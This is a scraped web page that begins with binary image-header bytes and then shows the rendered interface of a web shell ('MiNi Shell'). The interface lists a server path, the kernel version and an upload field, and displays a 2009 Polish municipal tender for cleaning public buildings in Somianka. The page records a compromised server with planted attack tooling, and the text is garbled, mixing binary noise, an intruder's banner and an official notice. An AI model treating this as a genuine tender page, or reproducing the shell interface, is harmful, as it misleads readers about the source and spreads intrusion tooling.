JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20090422/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20090422/117322-N-2009.html

<p class="kh_header"><b>Somianka: Utrzymanie czystości w budynku Urzędzie Gminy Somianka, Gminnym Ośrodku Kultury oraz pomieszczeń biurowych znajdujących się w Ośrodku Zdrowia w Somiance</b><br>
<b>Numer ogłoszenia: 117322 - 2009; data zamieszczenia: 22.04.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Somianka , Somianka - Parcele 16 B, 07-203 Somianka, woj. mazowieckie, tel. 029 7418790, faks 029 7418714.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Utrzymanie czystości w budynku Urzędzie Gminy Somianka, Gminnym Ośrodku Kultury oraz pomieszczeń biurowych znajdujących się w Ośrodku Zdrowia w Somiance.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest sprzątanie pomieszczeń biurowych w Urzędzie Gminy Somianka, gminnego Ośrodka Kultury oraz pomieszczeń biurowych znajdujących się w Ośrodku Zdrowia w Somiance.
Zakres prac do wykonania:

I.	Urząd Gminy Somianka - cała powierzchnia użytkowa parteru, piętra, klatki schodowej, częściowo piwnicy.
1.	Sprzątnie codzienne:
-	pokoje biurowe - 19 szt i korytarz wraz z klatką schodową i schodami do piwnicy o powierzchni ok. 513 m2
-	wycieranie kurzu i czyszczenie powierzchni biurek, szaf, szafek i innego sprzętu biurowego, a także z parapetów, pulpitów, listew ściennych itp. Powierzchni pod sprzętem komputerowym, jednakże bez sprzętu komputerowego i sprzętu mu towarzyszącego;
-	4 łazienki: czyszczenie glazury i terakoty, armatury, luster, wyposażenie w papier toaletowy, ręczniki papierowe, mydło w płynie, środki dezynfekujące, środki zapachowe/ uzupełniające z zapasem w miarę potrzeb i zużycia - powierzchnia 44 m2
-	opróżnianie i czyszczenie koszy na śmieci wraz z ich segregacją, wyposażeniem ich w worki na śmieci, wymiana worków
-	sprzątanie na sucho i mokro wszystkich podłóg pokrytych wykładziną PCV - 311 m2
-	odkurzanie wykładzin dywanowych i dywaników - 23 m2
-	sprzątanie na sucho i mokro podłóg drewnianych ( klepka) - 92 m2
-	sprzątanie na sucho i mokro schodów zewnętrznych, w tym usuwanie śniegu i innych odpadów - rano przed wydaniem kluczy pracownikom
-	otwieranie budynku przed rozpoczęciem pracy urzędu o godz. 7:40 (poniedziałek, środę, czwartek, piąte) o godz. 8:40 we wtorek i wydanie kluczy pracownikom oraz zamykanie budynku po godz. 16:00 w poniedziałek, środę, czwartek, piątek, natomiast we wtorek po godz. 17:00.

2.	Sprzątanie raz na tydzień
-	podlewanie i pielęgnacja kwiatów w pokoju wójta, w sali obrad, na korytarzu, klatce schodowej, w porze wiosenno - letniej także na zewnątrz budynku
-	pastowanie i polerowanie podłóg pokrytych PCV oraz podłóg drewnianych.
-	mycie drzwi 31 szt. wewnętrznych z łazienkami, 4 szt. duże wejściowe aluminiowe przeszklone. 

3.	Sprzątanie raz na trzy miesiące 
-	mycie otworów okiennych z PCV otwieranych (szt. 32, w tym 28 dwuskrzydłowe i 4 jednoskrzydłowe), drzwi balkonowe z PCV (7 szt.); wszystkie otwory z górnymi świetlikiem nie otwieranym; mycie szyb i ram od wewnątrz i z zewnątrz pomieszczenia;
-	pranie na mokro wykładzin dywanowych i dywanów
-	pranie wertykali
-	sprzątanie pomieszczeń w piwnicy: archiwum i magazynów obrony cywilnej

4.	Sprzątanie raz na pół roku 
-	zdejmowanie, pranie i zakładanie wszystkich firanek

5.	Sprzątanie w miarę potrzeb (okresowo)
-	sali konferencyjnych po posiedzeniach rady gminy, komisji rady gminy lub innych zgromadzeniach, w tym zmywanie szklanek i termosów.
-	inne dodatkowe sprzątanie związane z remontem

Czas pracy w miarę potrzeb realizacji obowiązków 
-	codziennie przed 7:40 schody zewnętrzne 
-	od godz. 16:00 pomieszczenia biurowe i łazienki
-	w dni wolne od pracy urzędu praca może być wykonywana w dowolnych godzinach.
-	sprzątanie w czasie niezbędnym do wykonania wszystkich zadań musi być wykonane w każdy dzień od poniedziałku do piątku, za wyjątkiem świąt, w sobotę w miarę potrzeb.


II.	Gminny Ośrodek Kultury:
1..   Sprzątanie codzienne:
-	pokoje biurowe - 9 szt i korytarz wraz z klatką schodową i schodami ok. 169 m2
-	2 łazienki: czyszczenie glazury i terakoty, armatury, luster, zabezpieczenie w papier toaletowy, ręczniki papierowe, mydło w płynie, środki dezynfekujące, środki zapachowe/uzupełnienie z zapasem w miarę potrzeb i zużycia - powierzchnia 15 m2
-	opróżnianie i czyszczenie koszy na śmieci wraz z segregacją, wyposażenie ich w worki na śmieci, wymiana worków w miarę potrzeb,
-	wycieranie kurzu i czyszczenie z powierzchni biurek, szafek, szaf i innego sprzętu biurowego, a także z parapetów, pulpitów, listew ściennych itp. pod sprzętem komputerowym, jednakże bez sprzętu komputerowego i sprzętu mu towarzyszącego
-	sprzątanie na sucho i mokro wszystkich podłóg pokrytych wykładziną PCV i lastryko - 169 m2
-	sprzątanie na sucho i mokro schodów zewnętrznych, w tym poranne usuwanie śniegu i innych odpadów.

2..  Sparzanie raz w tygodniu 
-	pastowanie i polerowanie podłóg pokrytych lastryko i PCV
-	mycie drzwi 11 szt. wewnętrznych z łazienkami, 1 szt. duże wejściowe aluminiowe przeszklone. 
-	podlewanie i pielęgnacja kwiatów, w porze wiosenno - letniej także na zewnątrz budynku

             3..  Sprzątanie raz na trzy miesiące 
-	mycie otworów okiennych z PCV otwieranych o powierzchni 50,9 m2; wszystkie otwory z górnymi świetlikiem nie otwieranym; mycie szyb i ram od wewnątrz i z zewnątrz pomieszczenia;
-	pranie wertykali i odkurzanie rolet

             4..    Sprzątanie raz na pół roku
-	zdejmowanie, pranie i zakładanie wszystkich firanek

             5..   Sprzątanie w miarę potrzeb (okresowo)
-	inne dodatkowe sprzątanie związane z remontem

Czas pracy w miarę potrzeby realizacji obowiązków 
-	od godz. 18:00 poniedziałek - piątek 
-	sprzątanie w czasie niezbędnym do wykonania wszystkich zadań musi być wykonane w każdy dzień od poniedziałku do piątku, za wyjątkiem świąt, w sobotę w miarę potrzeb.

III.	Ośrodek Zdrowia w Somiance:
-	powierzchnia użytkowa parteru bez całej części (skrzydła) gabinetów lekarskich i bez apteki, 
-	korytarza na parterze i piętrze, 
-	klatka schodowa, 
-	oddział przedszkolny
-	pomieszczenie wioski internetowej
-	punktu konsultacyjnego uzależnień
-	pomieszczenia Gminnego Ośrodka Pomocy Społecznej
Łącznej powierzchni użytkowej ok. 286 m2

1.	Sprzątanie codzienne:
-	wycieranie kurzu i czyszczenie z powierzchni biurek, szafek, szaf i innego sprzętu biurowego, a także z parapetów, pulpitów, listew ściennych itp. pod sprzętem komputerowym, jednakże bez sprzętu komputerowego i sprzętu mu towarzyszącego
-	opróżnianie i czyszczenie koszy na śmieci wraz z segregacją, wyposażenie ich w worki na śmieci, wymiana worków w miarę potrzeb,
-	4 łazienki: czyszczenie glazury i terakoty, armatury, luster, zabezpieczenie w papier toaletowy, ręczniki papierowe, mydło w płynie, środki dezynfekujące, środki zapachowe/uzupełnienie z zapasem w miarę potrzeb i zużycia - 48 m2
-	sprzątanie na sucho i mokro wszystkich podłóg pokrytych wykładziną PCV i lastryko - 163 m2
-	odkurzanie wykładzin dywanowych i dywaników - 75 m2
-	sprzątanie na sucho i mokro schodów zewnętrznych, w tym poranne usuwanie śniegu i innych odpadów.

2.	Sparzanie raz w tygodniu 
-	pastowanie i polerowanie podłóg pokrytych lastryko i PCV
-	mycie drzwi 8 szt. wewnętrznych z łazienkami, 

3.	Sprzątanie raz na trzy miesiące 
-	mycie otworów okiennych z PCV otwieranych (szt. 11, w tym 8 dwuskrzydłowe i 3 jednoskrzydłowe), drzwi balkonowe z PCV (10 szt.); wszystkie otwory z górnymi świetlikiem nie otwieranym; mycie szyb i ram od wewnątrz i z zewnątrz pomieszczenia;
-	pranie na mokro wykładzin dywanowych i dywanów
-	pranie wertykali i odkurzanie rolet

4.	Sprzątanie raz na pół roku
-	zdejmowanie, pranie i zakładanie wszystkich firanek

Czas pracy w miarę potrzeby realizacji obowiązków 
-	w godz. 8:00 - 18:00 poniedziałek - piątek na korytarzach, klatce schodowej i w łazienkach
-	od godz. 14:00 w pomieszczeniach przedszkola, za wyjątkiem wakacji, ferii i innych przerw
-	od godz. 18:00 poniedziałek - piątek pomieszczenia Wioski Internetowej
-	sprzątanie w czasie niezbędnym do wykonania wszystkich zadań musi być wykonane w każdy dzień od poniedziałku do piątku, za wyjątkiem świąt, w sobotę w miarę potrzeb.

Zamawiający informuje, że utrzymanie czystości w pomieszczeniach Gminnego Ośrodka Kultury w Somiance rozpocznie się najwcześniej od 01.01.2010 r..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 90.91.00.00-9, 90.91.12.00-8, 90.91.13.00-9, 90.91.92.00-4.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
<p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> W postępowaniu o udzielenie zamówienia publicznego mogą wziąć udział oferenci, którzy:
1.	posiadają uprawnienia do wykonywania działalności lub czynności odpowiadającym przedmiotowi zamówienia;
2.	posiadają niezbędną wiedzę i doświadczenie do wykonania zamówienia, oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonywania zamówienia.
3.	Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia.
4.	Nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na podstawie art. 24 ustawy - Prawo Zamówień Publicznych.

Ocena spełnienia przez Wykonawcę warunków udziału w postępowaniu nastąpi poprzez analizę dokumentów potwierdzających spełnienie warunków udziału w postępowaniu, metoda spełnia - nie spełnia.

Ocena spełnienia warunków szczegółowych nastąpi na podstawie przedstawionych przez Wykonawcę dokumentów i oświadczeń,.</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> W celu wykazania spełnienia warunków udziału w Postępowaniu, każdy z Wykonawców powinien przedłożyć następujące dokumenty i oświadczenia:
1.	poprawnie wypełniony formularz oferty z podaną ceną za całość przedmiotu zamówienia, podpisany przez osobę, osoby upewnione do reprezentowania Wykonawcy i zaciągnięcia zobowiązań w wysokości wartości złożonej oferty.;
2.	Podpisany formularz, oświadczenie o spełnieniu warunków z art. 22 ust.1 i o niepodleganiu wykluczeniu na podstawie art. 24 ust. 1 i 2 ustawy Prawo zamówień publicznych;
3.	aktualny odpis z właściwego rejestru albo aktualne zaświadczenia o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej wystawione, nie wcześniej niż 6 miesięcy przez upływem terminu składania ofert;
4.	aktualne zaświadczenie właściwego naczelnika Urzędu Skarbowego potwierdzające, że Wykonawca nie zalega z opłacaniem podatków, opłat lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
5.	parafowany przez Wykonawcę formularz umowy.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> http;//ugsomianka.bip.org.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Somianka,  07-203 Somianka.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.05.2009 godzina 10:00, miejsce: Urząd Gminy Somianka, 07-203 Somianka, pok. Nr 6. Otwarcie ofert nastąpi w pok. Nr 19 w dniu 04.05.2009r. o godz. 10:30.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com